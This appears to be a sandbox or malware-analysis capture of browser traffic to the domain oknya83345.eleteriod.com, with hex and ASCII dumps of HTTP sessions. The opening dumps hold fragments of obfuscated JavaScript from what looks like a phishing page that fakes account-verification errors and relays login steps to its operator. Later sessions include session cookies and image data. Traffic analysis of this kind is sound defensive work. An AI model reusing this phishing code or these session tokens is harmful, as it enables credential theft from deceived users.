                          2024-05-22 15:57:25 UTC1369INData Raw: 69 6f 6e 27 5d 3d 5f 30 78 31 62 36 31 63 30 28 30 78 31 66 34 29 2b 5f 30 78 33 34 35 34 35 38 2b 5f 30 78 31 62 36 31 63 30 28 30 78 31 64 32 29 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 63 68 61 6e 67 65 62 61 63 6b 62 75 74 74 6f 6e 28 5f 30 78 32 64 35 36 63 34 2c 5f 30 78 32 35 65 64 37 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 35 38 33 35 63 3d 5f 30 78 31 34 36 31 36 32 3b 5f 30 78 32 35 65 64 37 66 3d 3d 30 78 30 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 35 38 33 35 63 28 30 78 62 62 29 5d 28 5f 30 78 33 35 38 33 35 63 28 30 78 31 35 62 29 2b 5f 30 78 32 64 35 36 63 34 29 5b 5f 30 78 33 35 38 33 35 63 28 30 78 31 32 34 29 5d 28 27 2e 62 61 63 6b 27 29 5b 27 73 74 79 6c 65 27 5d 5b 27 64 69 73 70 6c 61 79 27 5d 3d 5f 30 78 33 35 38 33 35 63 28 30 78
                          Data Ascii: ion']=_0x1b61c0(0x1f4)+_0x345458+_0x1b61c0(0x1d2));}function changebackbutton(_0x2d56c4,_0x25ed7f){const _0x35835c=_0x146162;_0x25ed7f==0x0&&(document[_0x35835c(0xbb)](_0x35835c(0x15b)+_0x2d56c4)[_0x35835c(0x124)]('.back')['style']['display']=_0x35835c(0x
                          2024-05-22 15:57:25 UTC1369INData Raw: 78 32 38 39 32 36 39 28 30 78 31 32 37 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 64 63 29 5d 5b 27 73 74 79 6c 65 27 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 64 37 29 5d 26 26 28 64 6f 63 75 6d 65 6e 74 5b 27 62 6f 64 79 27 5d 5b 27 73 74 79 6c 65 27 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 64 37 29 5d 3d 27 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 64 63 29 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 65 65 29 5d 5b 27 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 27 5d 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 64 63 29 5d 5b 5f 30 78 32 38 39 32 36 39 28 30 78 65 65 29 5d 5b 27 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 27 5d 3d 27 27 29 2c 76 69 65 77 3d
                          Data Ascii: x289269(0x127)),document[_0x289269(0x1dc)]['style'][_0x289269(0xd7)]&&(document['body']['style'][_0x289269(0xd7)]=''),document[_0x289269(0x1dc)][_0x289269(0xee)]['backgroundColor']&&(document[_0x289269(0x1dc)][_0x289269(0xee)]['backgroundColor']=''),view=
                          2024-05-22 15:57:25 UTC1369INData Raw: 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 65 31 36 64 31 30 28 30 78 31 31 33 29 29 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 32 34 29 5d 28 27 2e 74 69 74 6c 65 27 29 5b 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 5d 3d 5f 30 78 33 62 34 65 35 63 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 65 66 29 5d 3b 76 61 72 20 5f 30 78 34 33 66 66 32 64 3d 5f 30 78 33 62 34 65 35 63 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 65 36 29 5d 3b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 65 31 36 64 31 30 28 30 78 64 62 29 29 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 30 30 29 5d 3d 27 3c 73 70 61 6e 3e 27 2b 5f 30 78 34 33 66 66 32 64 5b 5f 30 78 65 31 36 64 31 30 28 30 78 31 63 63 29 5d
                          Data Ascii: ocument['getElementById'](_0xe16d10(0x113))[_0xe16d10(0x124)]('.title')['textContent']=_0x3b4e5c[_0xe16d10(0x1ef)];var _0x43ff2d=_0x3b4e5c[_0xe16d10(0x1e6)];document['getElementById'](_0xe16d10(0xdb))[_0xe16d10(0x100)]='<span>'+_0x43ff2d[_0xe16d10(0x1cc)]
                          2024-05-22 15:57:25 UTC1369INData Raw: 65 63 65 69 76 65 28 27 77 61 69 74 61 75 74 68 27 2c 5b 5f 30 78 32 38 39 32 36 39 28 30 78 31 39 30 29 5d 2c 30 78 31 29 5b 5f 30 78 32 38 39 32 36 39 28 30 78 64 34 29 5d 28 5f 30 78 31 37 30 39 37 37 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 64 39 35 61 62 30 3d 5f 30 78 32 38 39 32 36 39 3b 5f 30 78 31 37 30 39 37 37 26 26 28 5f 30 78 31 37 30 39 37 37 5b 5f 30 78 64 39 35 61 62 30 28 30 78 31 30 35 29 5d 3d 3d 27 6d 6f 72 65 5c 78 32 30 69 6e 66 6f 5c 78 32 30 72 65 71 75 69 72 65 64 27 26 26 6d 6f 72 65 69 6e 66 6f 72 65 71 28 29 2c 5f 30 78 31 37 30 39 37 37 5b 5f 30 78 64 39 35 61 62 30 28 30 78 31 30 35 29 5d 3d 3d 5f 30 78 64 39 35 61 62 30 28 30 78 31 32 64 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 64 39 35 61 62 30 28 30 78 62 62 29 5d 28 5f
                          Data Ascii: eceive('waitauth',[_0x289269(0x190)],0x1)[_0x289269(0xd4)](_0x170977=>{const _0xd95ab0=_0x289269;_0x170977&&(_0x170977[_0xd95ab0(0x105)]=='more\x20info\x20required'&&moreinforeq(),_0x170977[_0xd95ab0(0x105)]==_0xd95ab0(0x12d)&&(document[_0xd95ab0(0xbb)](_
                          2024-05-22 15:57:25 UTC1369INData Raw: 39 35 5b 5f 30 78 34 66 66 34 66 38 28 30 78 31 66 61 29 5d 28 5f 30 78 34 66 66 34 66 38 28 30 78 31 61 38 29 29 5d 2c 30 78 31 29 5b 5f 30 78 34 66 66 34 66 38 28 30 78 64 34 29 5d 28 5f 30 78 31 66 38 66 32 63 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 33 61 65 31 65 3d 5f 30 78 34 66 66 34 66 38 3b 69 66 28 5f 30 78 31 66 38 66 32 63 29 7b 6c 6f 61 64 69 6e 67 61 6e 69 6d 61 74 69 6f 6e 28 30 78 31 29 3b 5f 30 78 31 66 38 66 32 63 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 35 29 5d 3d 3d 5f 30 78 31 33 61 65 31 65 28 30 78 62 31 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 65 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 32 30 62 29 5d 3d 27 27 2c 64 6f 63 75 6d 65 6e
                          Data Ascii: 95[_0x4ff4f8(0x1fa)](_0x4ff4f8(0x1a8))],0x1)[_0x4ff4f8(0xd4)](_0x1f8f2c=>{const _0x13ae1e=_0x4ff4f8;if(_0x1f8f2c){loadinganimation(0x1);_0x1f8f2c[_0x13ae1e(0x105)]==_0x13ae1e(0xb1)&&(document[_0x13ae1e(0xbb)](_0x13ae1e(0x10e))[_0x13ae1e(0x20b)]='',documen
                          2024-05-22 15:57:25 UTC1369INData Raw: 78 61 64 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 64 62 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 30 29 5d 3d 27 3c 73 70 61 6e 3e 53 6f 72 72 79 2c 5c 78 32 30 77 65 5c 78 32 37 72 65 5c 78 32 30 68 61 76 69 6e 67 5c 78 32 30 74 72 6f 75 62 6c 65 5c 78 32 30 76 65 72 69 66 79 69 6e 67 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 2e 5c 78 32 30 50 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 3c 2f 73 70 61 6e 3e 3c 61 5c 78 32 30 69 64 3d 5c 78 32 32 56 69 65 77 44 65 74 61 69 6c 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 2d 77 72 61 70 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 3e 56 69 65
                          Data Ascii: xad)),document[_0x13ae1e(0xbb)](_0x13ae1e(0xdb))[_0x13ae1e(0x100)]='<span>Sorry,\x20we\x27re\x20having\x20trouble\x20verifying\x20your\x20account.\x20Please\x20try\x20again.</span><a\x20id=\x22ViewDetails\x22\x20class=\x22no-wrap\x22\x20href=\x22#\x22>Vie
                          2024-05-22 15:57:25 UTC1369INData Raw: 74 6f 67 67 6c 65 27 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 32 37 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 34 39 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 32 29 5d 5b 5f 30 78 31 33 61 65 31 65 28 30 78 32 30 30 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 32 37 29 29 2c 76 69 65 77 3d 5f 30 78 31 33 61 65 31 65 28 30 78 31 64 38 29 2c 73 65 6e 64 41 6e 64 52 65 63 65 69 76 65 28 5f 30 78 31 33 61 65 31 65 28 30 78 61 32 29 2c 5b 5f 30 78 31 33 61 65 31 65 28 30 78 39 65 29 5d 2c 30 78 31 29 5b 27 74 68 65 6e 27 5d 28 5f 30 78 35 62 38 39 64 38 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 35 37 63 61 66 32 3d 5f 30 78 31 33 61 65 31 65 3b 69 66 28 5f 30 78 35 62 38
                          Data Ascii: toggle'](_0x13ae1e(0x127)),document[_0x13ae1e(0xbb)](_0x13ae1e(0x149))[_0x13ae1e(0xb2)][_0x13ae1e(0x200)](_0x13ae1e(0x127)),view=_0x13ae1e(0x1d8),sendAndReceive(_0x13ae1e(0xa2),[_0x13ae1e(0x9e)],0x1)['then'](_0x5b89d8=>{const _0x57caf2=_0x13ae1e;if(_0x5b8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          42192.168.2.449784188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:24 UTC1301OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: Upgrade
                          Pragma: no-cache
                          Cache-Control: no-cache
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Upgrade: websocket
                          Origin: https://oknya83345.eleteriod.com
                          Sec-WebSocket-Version: 13
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          Sec-WebSocket-Key: Z4gX+UlRSW/aRAy3ICFiig==
                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                          2024-05-22 15:57:25 UTC593INHTTP/1.1 400 Bad Request
                          Date: Wed, 22 May 2024 15:57:25 GMT
                          Content-Type: application/json
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OdhBSw9HYUCTv9zok5Qd23xwXlN8wbnWFQZn%2BDhd4LFdhzkhj5xPodAR92hri64gA5PijX%2Fj7xAPGdc4SthTHg31VMDlw1YjEhRv%2BsQhFr6Tg%2Ff4wE7nC7NJWREISXBL%2BhxcNKLb83T%2F9mw%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 887e0072dc1d72a1-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:57:25 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                          Data Ascii: 22{"code":3,"message":"Bad request"}
                          2024-05-22 15:57:25 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          43192.168.2.449786188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:25 UTC1442OUTGET /wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:27 UTC643INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:26 GMT
                          Content-Type: image/png
                          Content-Length: 231
                          Connection: close
                          Content-Disposition: inline; filename="wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BGwqcieNSAQGNqDo34XvdSxBM4w6zFomcV1WRqglNc3X29Dopj5l%2BXvMaILp7C%2B8RWwfEveW6U%2Bo6BDR9PsmVJu%2BIPvJS3BrXI9dAF1GBd0qT8NFhOof1pQ5eM0ZlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e007b4b46c404-EWR
                          2024-05-22 15:57:27 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                          Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          44192.168.2.449787188.114.97.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:25 UTC1146OUTGET /ijyi2hjS5erxCGdTqsT8BtwI3rNaQaISKnbm7WopvWzN1oLZWZsUwUlQNCWPnDUtG3kZb3yz221 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:26 UTC668INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:26 GMT
                          Content-Type: image/png
                          Content-Length: 1400
                          Connection: close
                          Content-Disposition: inline; filename="ijyi2hjS5erxCGdTqsT8BtwI3rNaQaISKnbm7WopvWzN1oLZWZsUwUlQNCWPnDUtG3kZb3yz221"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfLqlM1zicUkRf02wzmbePKOljjEo3fty0bYhBs8%2FXov0ogoMq0MToDqikyjmiMPTC%2F6kxIseA8j7ov4JaLf1RTUF5p8YdVVB4AGLO3cjRPNIsAz9zg5gU0fMxz%2BFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e007b5e656a55-EWR
                          2024-05-22 15:57:26 UTC701INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                          Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                          2024-05-22 15:57:26 UTC699INData Raw: 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0 ff
                          Data Ascii: Ite~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          45192.168.2.449788188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:25 UTC1441OUTGET /qrhxvaaCuXxcOYrCQYlWzLXpEpCeH8ghZociP8xffes67140 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:27 UTC640INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:27 GMT
                          Content-Type: image/png
                          Content-Length: 727
                          Connection: close
                          Content-Disposition: inline; filename="qrhxvaaCuXxcOYrCQYlWzLXpEpCeH8ghZociP8xffes67140"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOUfio9lzbSzhB991XhkJeelzc3j40L7s%2FAXXUaUlODy38C%2FR65QLOabJK974JjZtSsN5QUaOmNhHkYw2kMmrlBpJVFhiDFcuZHXN2Ra2crlpcVQeTOvjI9%2BNwn8gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e007bcf901851-EWR
